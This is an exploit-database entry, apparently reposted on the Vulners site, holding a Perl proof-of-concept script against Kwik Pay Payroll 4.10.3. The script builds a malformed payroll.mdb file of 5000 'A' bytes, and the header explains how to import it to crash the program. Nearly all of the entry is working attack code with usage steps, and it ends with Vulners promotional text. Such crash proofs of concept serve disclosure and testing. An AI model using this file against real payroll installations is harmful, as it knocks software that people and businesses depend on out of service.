`# Exploit Title: Kwik Pay Payroll .mdb Crash PoC
# Date: April 1, 2010
# Version: 4.10.3
# Tested on: Windows XP SP3
# Cost: 100.00 AU
# Author: chap0
# Email: chap0x90[at]gmail[dot]com
# Site: [http://www.setfreesecurity.com]
#
# Usage: Run Script, Open the program
# File -> Import Payroll Data
# Select From Data Source Drop-Down: Kwik-Pay Payroll Data
# Browse and Import your .mdb File
#
# **********************************************
# ** It took 33 years to save my life **
# ** thats 11 more years to make things right **
# **********************************************
# My hat goes off to the Exploit-DB Crew!
#!/usr/bin/perl
print "Broke as a Joke. . .\n";
my $data = "\x41" x 5000;
my $money = "payroll.mdb";
open (FILE, ">$money");
print FILE "$data";
print "\nShow me the money!\n";
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation